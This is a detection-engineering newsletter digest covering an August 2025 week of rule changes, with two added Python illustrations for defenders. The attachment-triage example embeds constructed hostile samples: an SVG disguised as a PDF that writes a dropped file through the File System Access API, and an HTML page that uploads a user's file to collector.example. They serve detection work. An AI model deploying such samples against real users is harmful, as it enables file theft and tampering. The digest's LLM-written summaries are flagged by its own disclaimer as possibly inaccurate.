Detections Digest #20250811
This issue highlights key updates to 6 repositories, covering 13 new and 31 modified detection rules.
This week's update highlights the most significant changes to detection rules from 6 of the 40+ monitored GitHub repositories. Between Aug 4 and Aug 11, 2025, contributors added 13 new rules and updated 31 existing ones.
Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.
Key Takeaways
New email detections target modern social engineering and browser-based attacks. Rules identify callback phishing from legitimate services like Zoom, BEC thread hijacking, and FileJacking attacks using the Chromium File System Access API. Existing detections were improved with Optical Character Recognition (OCR) for image-based phishing and MIME type checks for malicious SVG attachments. (sublime-security/sublime-rules, delivr-to/detections)
New YARA rules were added to detect malware payloads and attack chains. One set of rules identifies a multi-stage Java malware attack, covering its loader, final payload, obfuscator, and scheduled task persistence. A separate rule detects the Stealc infostealer by matching specific byte sequences within PE files. (Neo23x0/signature-base, kevoreilly/CAPEv2)
New rules ingest alerts from third-party security products to centralize threat data. Elastic now consumes SentinelOne threat alerts and carries more context on promoted CrowdStrike and Microsoft Sentinel alerts. Splunk added a detection that processes Cisco AppDynamics alerts for web application attacks such as SQLi and SSRF. (elastic/detection-rules, splunk/security_content)
A large set of Elastic's cloud detection rules for AWS, Entra ID, M365, and Okta was refactored. The changes standardize ES|QL query syntax and field naming for rules covering privilege escalation, data exfiltration, and brute-force attacks. This improves rule maintainability without altering core detection logic. (elastic/detection-rules)
Tuning of the SharePoint brand impersonation rules aims to reduce false positives. The logic was refined to better identify and exclude reply-chain emails from detection, and the rules now include exceptions for organization-specific tenant domains. (sublime-security/sublime-rules)
🚀 Make updates from this digest operational:
All detection rules from this digest are available in our MISP and STIX/TAXII feeds.
Subscribe to integrate directly into your SIEM, TIP, or SOAR solution, boosting your automated threat detection and enriching your existing intel.
Table Of Contents
sublime-security/sublime-rules (+5, ✎11)
elastic/detection-rules (+1, ✎19)
splunk/security_content (+1)
delivr-to/detections (+2)
kevoreilly/CAPEv2 (✎1)
Neo23x0/signature-base (+4)
Corporate repositories (4)
sublime-security/sublime-rules (+5, ✎11)
+ New rules
New rules target email-based social engineering. Detections include BEC thread hijacking to obtain mobile numbers, callback phishing from legitimate Zoom infrastructure, and Disney brand impersonation for credential theft. These rules use NLU, sender analysis, and logo detection to identify the threats. (Business Email Compromise: Request For Mobile Number Via Reply Thread Hijacking, Callback Phishing via Zoom comment, Brand Impersonation: Disney)
New rules identify mass-distributed malicious or unwanted emails. One rule detects predatory academic journal solicitations by combining content analysis with technical indicators like new domains. Another rule flags malicious links on free hosting services sent to undisclosed recipients to find widespread campaigns. (Predatory Academic Journal Solicitation, Link: Free file hosting with undisclosed recipients)
✎ Modified rules
Two rules for detecting Microsoft SharePoint impersonation were refined. Updates improve the logic for identifying and excluding reply-chain emails and add exceptions for organization-specific tenant domains, reducing false positives while maintaining coverage. (Brand impersonation: Sharepoint, Brand impersonation: Sharepoint fake file share)
Detection for malicious SVG file attachments was improved across multiple rules. Changes include identifying SVGs by MIME type, not just file extension, and scanning for code execution, content padding, and their use in voicemail phishing schemes. (Attachment: SVG file execution, Attachment: Web files with suspicious comments, Fake voicemail notification (untrusted sender))
Detection for credential phishing emails was broadened. One rule adds keywords like 'stuck' and 'sign in' for quarantine-themed lures. Another now uses Optical Character Recognition (OCR) to find credential theft intent in images and matches more variations of 'secure message' lures. (Fake email quarantine notification, Credential phishing: 'Secure message' and engaging language)
Several rules were tuned for accuracy and performance. This includes more robust DMARC checks for emails containing catbox.moe links, a performance modification to a reconnaissance email detector, and new domain exclusions to reduce false positives in a Microsoft brand impersonation rule. (Catbox.moe Link From Untrusted Source, Reconnaissance: All recipients cc/bcc'd or undisclosed, Brand impersonation: Microsoft)
The rule for detecting sextortion emails was updated with additional keywords. New terms like 'remote access', 'explicit', and threat phrases involving 'forward' and 'coworkers' were added to improve detection of varied extortion message content. (Extortion / sextortion (untrusted sender))
elastic/detection-rules (+1, ✎19)
+ New rules
A new rule integrates SentinelOne endpoint alerts into the Elastic SIEM. It queries the logs-sentinel_one.threat-* indices for documents with event.kind: alert and promotes SentinelOne findings to Elastic detection alerts, centralizing threat data for investigation within the Elastic Security application. (SentinelOne Threat External Alerts)
✎ Modified rules
Multiple AWS detection rules for CloudTrail were refactored to standardize ES|QL query syntax and field naming. These rules cover S3 enumeration, EBS snapshot manipulation for exfiltration or recovery inhibition (T1490, T1485), S3 web content modification, and IAM privilege escalation. The changes improve query maintainability without altering core detection logic. (AWS S3 Bucket Enumeration or Brute Force, AWS EC2 EBS Snapshot Shared or Made Public, AWS S3 Static Site JavaScript File Uploaded, AWS S3 Object Encryption Using External KMS Key, AWS EC2 EBS Snapshot Access Removed, AWS IAM AdministratorAccess Policy Attached to User)
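As an added illustration of the EBS snapshot cases named above (this is not code from the Elastic rule set), the Python below runs the underlying CloudTrail logic over a few constructed records: a snapshot is shared with another account or made public through ModifySnapshotAttribute with attributeType CREATE_VOLUME_PERMISSION, and the access-removal case is the remove side of the same call. The OWN_ACCOUNTS set, the severity mapping, and the sample account and snapshot IDs are assumptions made for the example.

```python
"""Added example, not code from the Elastic rule set: CloudTrail logic behind the
EBS snapshot sharing / access-removal rules, run over constructed records."""
from __future__ import annotations

# Hypothetical: the AWS accounts you own. Sharing among these is routine cross-account work.
OWN_ACCOUNTS = {"111111111111", "222222222222"}

# Severity per finding is this example's choice, not the rule set's.
SEVERITY = {
    "snapshot_made_public": "high",
    "snapshot_shared_external": "medium",
    "snapshot_access_removed": "low",
}
_RANK = ["low", "medium", "high"].index


def classify_snapshot_event(rec: dict) -> dict | None:
    """Return an alert for a successful ModifySnapshotAttribute call that changes
    createVolumePermission; None for anything else."""
    if rec.get("eventSource") != "ec2.amazonaws.com":
        return None
    if rec.get("eventName") != "ModifySnapshotAttribute":
        return None
    if rec.get("errorCode"):                      # request was denied, nothing changed
        return None
    params = rec.get("requestParameters") or {}
    if params.get("attributeType") != "CREATE_VOLUME_PERMISSION":
        return None
    perm = params.get("createVolumePermission") or {}
    findings: list[tuple[str, str]] = []
    for item in (perm.get("add") or {}).get("items") or []:
        if item.get("group") == "all":            # group=all is the public share
            findings.append(("snapshot_made_public", "all"))
        elif item.get("userId") and item["userId"] not in OWN_ACCOUNTS:
            findings.append(("snapshot_shared_external", item["userId"]))
    for item in (perm.get("remove") or {}).get("items") or []:
        findings.append(("snapshot_access_removed", item.get("group") or item.get("userId", "?")))
    if not findings:
        return None
    return {
        "snapshot_id": params.get("snapshotId"),
        "actor": (rec.get("userIdentity") or {}).get("arn"),
        "source_ip": rec.get("sourceIPAddress"),
        "time": rec.get("eventTime"),
        "findings": findings,
        "severity": max((SEVERITY[f] for f, _ in findings), key=_RANK),
    }


def run(records: list[dict]) -> list[dict]:
    return [a for a in map(classify_snapshot_event, records) if a]


# Constructed CloudTrail records in the documented ModifySnapshotAttribute shape.
def _rec(name: str, params: dict | None = None, **extra) -> dict:
    base = {
        "eventVersion": "1.08", "eventTime": "2025-08-06T13:02:11Z",
        "eventSource": "ec2.amazonaws.com", "eventName": name, "awsRegion": "us-east-1",
        "sourceIPAddress": "198.51.100.23",
        "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111111111111:user/deploy"},
        "requestParameters": params or {},
    }
    base.update(extra)
    return base


def _perm(snapshot: str, add=None, remove=None) -> dict:
    p = {}
    if add:
        p["add"] = {"items": add}
    if remove:
        p["remove"] = {"items": remove}
    return {"snapshotId": snapshot, "attributeType": "CREATE_VOLUME_PERMISSION",
            "createVolumePermission": p}


SAMPLE = [
    _rec("ModifySnapshotAttribute", _perm("snap-0a1b2c3d4e5f60001", add=[{"group": "all"}])),
    _rec("ModifySnapshotAttribute", _perm("snap-0a1b2c3d4e5f60002", add=[{"userId": "999999999999"}])),
    _rec("ModifySnapshotAttribute", _perm("snap-0a1b2c3d4e5f60003", add=[{"userId": "222222222222"}])),
    _rec("ModifySnapshotAttribute", _perm("snap-0a1b2c3d4e5f60004", remove=[{"userId": "999999999999"}])),
    _rec("ModifySnapshotAttribute", _perm("snap-0a1b2c3d4e5f60005", add=[{"group": "all"}]),
         errorCode="Client.UnauthorizedOperation"),
    _rec("DescribeSnapshots"),
]

if __name__ == "__main__":
    for alert in run(SAMPLE):
        print(alert["severity"], alert["snapshot_id"], alert["findings"])
```

Three of the six records produce alerts: the public share, the share with the unknown account, and the permission removal. The share with an owned account and the denied call are ignored, which is the same outcome-and-scope filtering the production rules apply.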
A set of rules detecting brute-force, password spraying, and session hijacking attacks against cloud identity providers was updated. These rules target Microsoft Entra ID, Microsoft 365, and Okta. Most changes involve ES|QL query refactoring for syntax and naming consistency, improving rule maintainability. (Microsoft Entra ID MFA TOTP Brute Force Attempts, Microsoft Entra ID Sign-In Brute Force Activity, Microsoft Entra ID Session Reuse with Suspicious Graph Access, Microsoft 365 Brute Force via Entra ID Sign-Ins, Multiple Microsoft 365 User Account Lockouts in Short Time Window, Multiple Okta User Authentication Events with Client Address)
Three Linux host-based detections were improved. A rule for network egress from unusual paths was corrected to fix a regex pattern and an IP exclusion. The web shell detection filter was tightened, and the port scanning detection was tuned for performance. These changes increase the accuracy and efficiency for detecting reconnaissance, C2, and web compromise. (High Number of Egress Network Connections from Unusual Executable, Unusual Command Execution from Web Server Parent, Potential Port Scanning Activity from Compromised Host)
Two rules targeting PowerShell obfuscation techniques, runtime string reconstruction from character arrays and string reordering, were refactored. The changes standardize ES|QL query syntax and improve performance, making the detections for these evasive script behaviors more robust and maintainable. (Potential PowerShell Obfuscation via Character Array Reconstruction, Potential PowerShell Obfuscation via String Reordering)
Rules that promote alerts from Microsoft Sentinel and CrowdStrike Falcon were updated. The Sentinel rule adds a 'critical' severity mapping. The CrowdStrike rule uses the specific alert name for the title, improving contextual information for alerts ingested from third-party tools. (Microsoft Sentinel External Alerts, CrowdStrike External Alerts)
splunk/security_content (+1)
+ New rules
A new rule ingests Cisco AppDynamics SecureApp alerts to identify web application attacks. It detects SQL injection, API abuse, deserialization, SSRF, and Log4j exploit attempts. The rule adds severity and a risk message to the alerts, giving analysts context on application layer threats. (Splunk AppDynamics Secure Application Alerts)
delivr-to/detections (+2)
+ New rules
Two new rules detect FileJacking attacks delivered via email. One rule inspects HTML or SVG attachments, while the other analyzes linked web content. Both identify JavaScript patterns that use the Chromium File System Access API, a method to read or modify a user's local files. (Attachment: FileJacking Indicators (Unsolicited), Link: FileJacking Indicators (Unsolicited))
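The two attachment-side points in this issue, identifying SVG by content rather than by extension (the Sublime SVG changes above) and spotting the File System Access API patterns the delivr-to FileJacking rules look for, are shown together in the following added Python example. It is not code from either rule set: the attachments it scans are constructed, the verdict thresholds are this example's own, and only the show*Picker / createWritable / getFileHandle names are real Chromium API identifiers.

```python
"""Attachment triage for the SVG/HTML cases above. Added example only, not code from
the Sublime or delivr-to rule sets; every attachment below is constructed."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Chromium File System Access API entry points (real API names). A page needs a picker
# call to obtain a handle; the write helpers turn read access into file dropping.
_PICKER = re.compile(r"\b(show(?:Directory|OpenFile|SaveFile)Picker)\s*\(")
_WRITE = re.compile(r"\b(createWritable|getFileHandle|removeEntry)\s*\(")
_READWRITE = re.compile(r"\bmode\s*:\s*['\"]readwrite['\"]")

# Content sniffing. The SVG root is tested first because an SVG may embed <script>.
_SVG_ROOT = re.compile(
    r"\A\s*(?:<\?xml[^>]*\?>\s*)?(?:<!--.*?-->\s*)*(?:<!DOCTYPE[^>]*>\s*)?<svg\b",
    re.IGNORECASE | re.DOTALL)
_HTML_MARKER = re.compile(r"<!DOCTYPE\s+html|<html\b|<body\b|<script\b", re.IGNORECASE)
_SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.IGNORECASE | re.DOTALL)
_EVENT_HANDLER = re.compile(r"\bon[a-z]+\s*=\s*([\"'])(.*?)\1", re.IGNORECASE | re.DOTALL)
_JS_URL = re.compile(r"(?:xlink:)?href\s*=\s*([\"'])\s*javascript:(.*?)\1", re.IGNORECASE | re.DOTALL)
_EXT_TYPE = {"svg": "svg", "html": "html", "htm": "html"}


@dataclass
class Scan:
    filename: str
    sniffed_type: str                 # "svg", "html" or "other", decided from content
    type_mismatch: bool               # content type disagrees with the file extension
    indicators: list[str] = field(default_factory=list)
    verdict: str = "clean"            # clean | script | fs_access | filejacking

def sniff_type(text: str) -> str:
    if _SVG_ROOT.search(text):
        return "svg"
    if _HTML_MARKER.search(text):
        return "html"
    return "other"

def extract_script(text: str) -> str:
    """Everything a browser would execute: <script> bodies, on* handlers, javascript: hrefs."""
    parts = [m.group(1) for m in _SCRIPT_BLOCK.finditer(text)]
    parts += [m.group(2) for m in _EVENT_HANDLER.finditer(text)]
    parts += [m.group(2) for m in _JS_URL.finditer(text)]
    return "\n".join(parts)

def filejacking_indicators(script: str) -> list[str]:
    found = [m.group(1) for rx in (_PICKER, _WRITE) for m in rx.finditer(script)]
    found = list(dict.fromkeys(found))            # dedupe, keep first-seen order
    if _READWRITE.search(script):
        found.append("mode:readwrite")
    return found

def scan_attachment(filename: str, data: bytes) -> Scan:
    text = data.decode("utf-8", errors="replace").lstrip("\ufeff")
    kind = sniff_type(text)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    result = Scan(filename, kind, kind != "other" and _EXT_TYPE.get(ext) != kind)
    if kind == "other":
        return result
    script = extract_script(text)
    if not script.strip():
        return result
    result.indicators = filejacking_indicators(script)
    pickers = {i for i in result.indicators if i.endswith("Picker")}
    if pickers and len(result.indicators) > len(pickers):
        result.verdict = "filejacking"            # handle obtained and then used to write
    elif pickers:
        result.verdict = "fs_access"              # read access only; still unusual in mail
    else:
        result.verdict = "script"
    return result


# Constructed samples: an SVG delivered under a .pdf name, a clean SVG, and an HTML reader.
DISGUISED_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="600" height="400">
  <text x="20" y="40">Invoice 4471 - click to open</text>
  <script><![CDATA[
    document.addEventListener("click", async () => {
      const dir = await window.showDirectoryPicker({ mode: "readwrite" });
      const fh = await dir.getFileHandle("update.js", { create: true });
      const w = await fh.createWritable();
      await w.write("/* dropped payload */");
      await w.close();
    });
  ]]></script>
</svg>
"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4"/></svg>'
READER_HTML = b"""<!DOCTYPE html><html><body onload="init()"><script>
async function init() {
  const [h] = await showOpenFilePicker();
  const f = await h.getFile();
  await fetch("https://collector.example/upload", { method: "POST", body: await f.text() });
}</script></body></html>"""

if __name__ == "__main__":
    for name, blob in (("invoice.pdf", DISGUISED_SVG), ("logo.svg", BENIGN_SVG), ("form.html", READER_HTML)):
        print(scan_attachment(name, blob))
```

The disguised sample is caught twice over: its content is SVG although it was named .pdf, and its script obtains a directory handle and writes into it, which is the FileJacking pattern. The HTML reader only reads a user-chosen file, so it lands in the weaker fs_access bucket; a mail rule would still treat that as suspicious for an unsolicited sender.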
Personal repositories (2)
kevoreilly/CAPEv2 (✎1)
✎ Modified rules
The YARA rule for the Stealc infostealer was updated to detect the StealcV2 payload by matching specific byte sequences within PE files. (StealcV2)
Neo23x0/signature-base (+4)
+ New rules
A set of four new YARA rules provides layered detection for a Java-based malware attack chain. The rules identify a Java loader by its file structure, a specific final payload JAR via combined signature strings, files obfuscated with the Allatori Obfuscator, and persistence established through Windows Scheduled Tasks that execute JAR files. (SUSP_Scheduled_Task_Java_JAR_Aug25, SUSP_JAVA_Loader_Indicators_Aug25, MAL_JAVA_Loader_Final_Jar_Aug25, SUSP_JAVA_Class_Allatori_Obfuscator_Aug25)
Feedback
Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have any other suggestions, we'd love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving the content we produce.
Disclaimer
The summaries in this brief are generated by an LLM based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.
Powered by
This digest is built with BlackStork.
Looking for a customized version of this newsletter? We'd be happy to help — contact us.